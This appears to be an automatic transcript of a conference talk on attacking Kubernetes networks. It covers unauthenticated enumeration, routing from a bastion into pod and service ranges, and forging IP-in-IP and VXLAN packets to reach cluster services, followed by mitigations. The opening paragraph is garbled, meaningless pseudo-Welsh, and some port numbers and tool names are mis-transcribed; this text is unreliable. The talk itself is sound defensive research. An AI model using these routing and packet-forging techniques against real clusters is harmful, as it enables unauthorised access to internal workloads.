 Ddiolch yn fawr, a chwybod i bwysig am gweithio cymryd Cwmonellies na fywch yn yr ystyried i'r gweithio. Felly, mae'r gweithio ei ddweud o'r ffwg oedd mewn. Felly, mae'r gweithio'n fwyaf, ac mae'r gweithio'r gweithio'r plain gyda'u cymryd cymryd. Ie bwysig o'r sgwyrdd cynsultant, ac mae'r gweithio o'r sgwyrdd cymryd ac ymddangosol i gweithio'r ac ymddangosol i'r gweithio'r awdau CTF. mae'r cyfnod i'r ffordd rhan o'r ferfodleddau clywedol. Felly wedi bod yn bwysig ar y ddweud. Rwy'n ganddo ar y dyfodol ymddi gwir y clywedol yma, a'r fawr i'n ffordd ar y cyfnod i'r cyrraeth. Fawr i'n ffawr i'r bwysig ar y ffawr o'r pryd-fawr a'r ffawr i'r bwysig ar y cyfnod i'n bwysig ar y ffordd. Mae'n bwysig ar y ddweud i'r bwysig ar y ddweud i'r bwysig ar y pryd-fawr in two separate parts and then we'll run through how we can defend against the attacks that we mentioned. So why do we care about any of this? Typically in a Kubernetes assessment, a security assessment in my experience, we'll start from the perspective of a compromised workload, a compromised pod. Maybe we assume that a developer laptop's been compromised, but there is still some attack service that is not accounted for. Let's have a look at what we can get from an unauthenticated perspective in the network using some more classical techniques. So we're going to start by having a look at open ports on our nodes. So if we use one of our favourite port mapping tools and take a typical worker node, we might expect something like this to show up. So as we're using Linux Kubernetes nodes, it's fairly typical to expect SSH to be open, but ports 10.256 and 10.250 are Kubernetes components. We can verify this just by jumping on one of the machines and verifying that kube proxy owns 10.256, and this exposes a healthy health check API, which doesn't really have too much attack surface, so we'll move on. Port 10.250 is a little bit more interesting, as this is the kubelet API. In modern versions of Kubernetes, this is authenticated, however, and so from a perspective on the network where we don't have any credentials, there's not much to see here. On that topic, however, if we did find any credentials, there's an excellent tool from Cyberock called kubelet CTL that actually documents this API. It's a little bit outside of the scope of the talk today. So if we move on to what a control plane load might look like in a self-managed cluster, we can see some familiar ports from the worker node. So we've still got those kubelet and kube proxy ports and SSH for administration. We also have ports TCP 2379 and 2380, which are used by the SCD theme and running on a control plane. If we're running in a configuration, we're actually running on our control plane nodes. By default, this uses mutual TLS, and so, again, not much we can gain here. The most interesting port here is 6443. This is the default port for the Kubernetes API server, and we can start learning some information. As the end map scan indicates, it's detected that there might be some SSL or TLS service listening on that port. So if we attempt to connect to it with open SSL, we can actually dump TLS certificate listening on that port. Although there's a lot of information in there, the most interesting thing to us at this stage is the subject alternative name field. So this can contain two types of information, the first of which is a DNS name, and the second of which is an IP address. So by default, Kubernetes will assign an IP address to each, or sorry, assign an IP address in the certificate to each IP address which the API server listens. So in this instance, we can see that it contains the IP address of the API server Kubernetes service, which is an information leak which could help us to determine the Kubernetes service network range. This will be important later. The API server also has one or two unauthenticated end points, probably the most common of which is the slash version end point. It's not a huge amount of information here, but it does at least tell us exactly the exact version of the cluster that we're running, which might be useful if we want to check for already known vulnerabilities or CVEs. So just to make this a bit easier, I've written a little end map script that'll tell us both the subject alt names and that version information. Also makes it a little bit easier if we're enumerating across several hosts. So one area that is sometimes overlooked with network scanning is UDP scanning. So sometimes it can be a bit slow, the nature of the thing is just a bit awkward. But in this scenario, we have a good idea of what we're expecting to be running on the other side, so we have a higher chance of success. So we can look for ports which run common networking and storage protocols. So, for example, here in the scan on screen, we can see that we have port 4789, which is commonly used for VXLAN overlay networking. We'll talk a little bit more about that later. So in this first section, all these issues have been informational. We wouldn't really expect them to be, or we wouldn't raise them as any kind of exploit really. But in this next section, we'll have a little bit of a look at some of the privatives of the Linux nodes that we're running and see if we can achieve something that we might call an exploit. So for those of you that have set up a QBDM cluster, or a cluster with a tool like QBDM, we'll be aware that before you're able to run the tool, the node that you're running on has to meet certain requirements. And this is based on the features of the Linux kernel on the node. So one example of this is the IPv4 forwarding feature. And what this means, if we turn it on, is that the Linux machine will root IP packets based on the rules it's configured with. So this will be its IP tables rules or NF tables rules. So in the words of Bory McEwn, Kubernetes is a router. And this has some implications that we may not expect. So if you consider for a moment, we have a architecture, something like the above, where we've tried to harden our cluster by not exposing our API server to the public internet. So we implemented a jump host. And how we've implemented it is we've got one network, one subnet with our bastion, and that's the same as the all of our Kubernetes nodes. Using the previous described routing functionality, we can actually add routes to this bastion that will allow us to talk to pods and services within the cluster. So let me show you what I mean. How are we doing? Everyone at the back see that? Grand, thank you. So to start with, we'll use that script I showed to enumerate some basic information about the cluster. And we can see that here we're able to reveal the first IP in the service network. So what we'll do now is make a small assumption that this network is a slash 24 network. We can increase it to a later stage if we need to, but for the time being, this will allow us to allow us to add a route via one of the nodes that we previously discovered, like so. What we'll now do is look for the commonly deployed Kubernetes DNS component or core DNS. We know this is going to listen on TCP 53, so we can scan this service range for all IP addresses looking for that port. Great. Looks like we found it. So we can see that core DNS is running on the service IP 10, 100, 0, 10. This is really powerful because core DNS contains a lot of information about the state of the cluster. So what we'll do in this next step is we'll use the wild card functionality of core DNS to list all other services within the cluster. And although that's slightly wrapped, hopefully you should be able to see that we have the core DNS service, the default Kubernetes service, and this other dashboard in the default namespace. So we should be able to just connect to that dashboard to see what it presents. Let's try it. And as we can see, we can connect directly to that service IP from our bastion without any authentication. We're going to take this a step further and query core DNS for all the service endpoints. So these are all the pod IPs that the service is in the cluster to talk to. And what this allows us to see is some of the pod IPs in use by the cluster. So we can see down here we have the 10.0.102 range IP addresses. And this allows us to make further educated guess as to what network range the pod network is using. And we're going to guess that it's using the 10.0.0.0 slash 16 range. And again, we can add this, add a route to this via one of our nodes. Following this, we can scan directly across this range. And this will allow us to detect all pods even if they weren't necessarily assigned to a service. So over here, we're just using three ports, but you could conduct a full port scan if you wanted to. And we can see that we found a pod IP address when port 8080. And again, we can curl it to check we can reach it. For this example, we're using the same dashboard, but with this time, we're using the pod IP address. We can confirm that we can reach that service from our bastion without any authentication whatsoever. And one slide. So you might think this is a little bit of a little bit dodgy functionality. Why does it exist? But in truth, it's actually used as functionality by some of the existing CNIs. So both Romana and Cributa make use of this. And it's with good reason because there are performance and complexity benefits to using this kind of routing over, say, an overlay network. But I'll leave you to decide whether it's a valid feature or it is indeed a bug. So so far, we've looked at layer two networks. But in the real world, it's likely that we'll have nodes deployed in different subnets, different regions, different availability zones, maybe. And so we might want to bridge our traffic over a layer three network. This is what overlay networks come in. Many CNIs these days will deploy with some kind of overlay network. And under the hood, these will use either VXLAN or IP in IP technology. So if you could consider for a moment the following architecture. Similar to before, we have a bastion host that we're asking users to pivot through. But this is similar to before. We have our Kubernetes nodes running in one or more other subnets that are not directly the same one as our bastion. So to give an overview of the IPIP protocol, we'll look at the layers two through four of the networking stack. IPIP encapsulation works by encapsulating a layer three IP packet with another layer three IP packet. In a standard pod-to-pod communication, the outer packet will contain the source node IP and the destination node IP. And the inner packet will use the source pod IP IP address and the destination pod IP address. However, if an attacker were to have access to a bastion, they may be able to forge or create malicious packets. So they may be able to change the content of any of these headers that we care about. So in order for an attacker to root to pods in our cluster, they would need to specify the right destination node IP in the outer IP packet and the right destination pod IP in the inner packet. However, they have some control over the source IP addresses. The inner IP packet source IP address is important as the attacker can set this to influence the return root of the IP packet. Let me explain that a bit. So because the Kubernetes node does not understand that we are sending it IP IP packets, we have a single-sided tunnel. It has no root or has no rules to be able to encapsulate for the return journey. So therefore, we need to find a way of returning data to the bastion host. If we set the inner IP packet source address to the attacker's bastion, when this packet gets un-encapsulated and then a response from whichever pod we're talking to, we'll use this source address as the destination. In this manner, we can achieve a form of asymmetric routing, which allows us to retrieve a response from the node. The outer IP packet source address is important as we can use it to bypass host firewall rules in some scenarios. So I appreciate that's a bit to take in. So let me give a little bit of context here. This is a proof of context script, which demonstrates the concept using the escapee packet manipulation library. We can see that in the outer packet, we're using the 10.123.0.10 IP addresses the source. So this is just any other node in our cluster. We can see that we're using the 10.123.0.20 IP address as our destination node IP. This is the one where the pod we're targeting is running. For the inner packet, we're using the bastion IP address as the source and the target IP address of the pod, which in this case is called DNS as the destination IP of the inner packet. We then assemble the packet using escapee, targeting the any any service cluster.local DNS address, hoping to achieve similar results to before. So we can see that this executes and that we send and receive normal DNS packets. If we look a bit deeper, we can see that the sent packet is IP and IP encapsulated, and our response is not. Thus showing we're able to achieve asymmetric routing and communicate with services inside the cluster from the bastion from an authenticated perspective. So not all overlay networks use IP in IP. We also have VXLAN networks. Again, looking at the structure of layers two through four, we can see that this time it's much more complicated. In VXLAN, a layer two Ethernet frame and a VXLAN header is encapsulated in a layer four UDP datagram. The header fields that we care about in the outer IP packet are again the source node IP and destination, which in the normal flow is the node IP. In the inner IP packet, the pod IP will be the source pod IP and the destination IP address will be the destination pod IP. However, in VXLAN, we have some additional headers. So in the VXLAN header, we have the VNI ID. Whilst used in other VXLAN implementations in all the Kubernetes CNIs I've seen, it's hardcoded to one. We also have this concept of VTEP, which is the VXLAN tunnel endpoint. Unfortunately for us, this is a randomly generated hardware address. And so to attack against VXLAN in a reasonable time frame, we need to leak this in the cluster. This is annotated on a node resource object, so the permissions we would need would be get nodes. So thinking back to our network architecture where we have that bastion in a separate subnet and we have our nodes in adjacent subnets, let's have a look at which headers an attacker would want to modify. So in order to route to the right node and right pod, the destination IP addresses in both of the IP packets will need to be set correctly as before. And as before, we can set the source IP address in the inner IP packet to achieve asymmetric routing. We can also set the source IP address in the outer IP packet to that of another node to try and bypass any host firewall rules that prevent us from sending packets to that node. An attacker can fairly safely just hard code the VNI to one, although if they know that they're targeting a CNI that uses something different, they can potentially modify it. And as previously mentioned, they would need to leak the VTEP address from the cluster via another method. So let's have a little bit of a look at how that looks in a proof of concept script. So in the script, we set the outer source IP address to 101230.10, which is the IP address of another node. And we set the outer destination IP address 2.20, which is the target node. We set the VXLAN port to 4789, which is well known, and we enumerated during our n-map script earlier. And we set the VNI to one. We include the VTEP address that we leaked from the cluster, and we set the source IP address of the inner packet to our bastion. And similarly to before, we are going to be targeting the core DNS service and use the service address of that pod. We then construct the packet using scapey and send to our cluster. We can see we're able to certainly do so, and that we are able to send a request in the right format and receive a response in the right format. If we look a little bit deeper, we can see our request is VXLAN encapsulated as expected, and our response is not. It's just a standard DNS response. So showing this shows that if we have knowledge of the VTEP address of a node, we can communicate with pods and services inside our cluster from an adjacent subnet. So the eagle eye amongst you will have noticed that in the proof of concept scripts, they're run as the root user. Although we use it for the proof of concept, we could use the bash dev TCP and dev UDP sudo devices to achieve similar results. So we don't necessarily need the root user to achieve this attack. In order to mitigate some of the level two attacks discussed in the first section, I would strongly recommend that you isolate any bastion hosts or any untrusted workloads in different subnets to that of your nodes. If we do that, it also means that we're able to write firewall rules, strict firewall rules, to prevent any kind of other traffic traversing between these machines. So, for example, in the second half, in my lab environment, there were no rules between these two subnets to prevent that traffic, which is one of the reasons why we're able to do it. In terms of Kubernetes native things we can do, network policies also help us here. We can implement policies between workloads in our cluster, so between individual pods, and this will prevent us being able to communicate with pods from outside the cluster, so we wouldn't have been able to curl that unauthenticated dashboard. Additionally, we can also add network policies around Kube system if we wanted to prevent access to privileged components. So if we added a network policy to prevent we can add a network policy to prevent access to core DNS from outside the cluster, and it's probably a good idea in terms of general hardening. I mentioned a couple of times that we could set the source IP address of the outer IP packet to avoid host firewall limitations. This is more commonly known as IP spoofing, and routers often have protection against this, but it's not always turned on. So in my research some CNIs needed this, some didn't, and so you may want to investigate turning this protection on to prevent these kind of attacks. The Linux kernel actually has a feature to prevent some of the asymmetric routing that I mentioned earlier called reverse path filtering. Most distributions don't actually enable this by default, so it's either off or in a permissive mode. You could experiment with setting this to a strict mode so that these kind of attacks are not possible, although it's unclear whether this will affect any of the Kubernetes functionality, so you should test this well. So I've released the Nmap Kubernetes Info script on GitHub and the Kubernetes, the other proof of concept scripts that you welcome to use and contribute to, and that's my Twitter handle if you want to follow me, but thanks for listening. I think we've got time for questions if anyone has any. Yes, down at the front, I think we've got a mic. So the question was, could I use an internal IP address to bypass network policy? Good question. I don't think so because I think that in order to bypass network policy, you would need to be able to set the IP address of the inner packet. I guess it would be kind of almost like a CSRF situation. If you had a workload where, because you'd probably also not be able to make a connection, so you'd need something that accepted UDP packets that you could make a permanent request, it would be quite convoluted, I'm not sure. If that's it, thanks very much.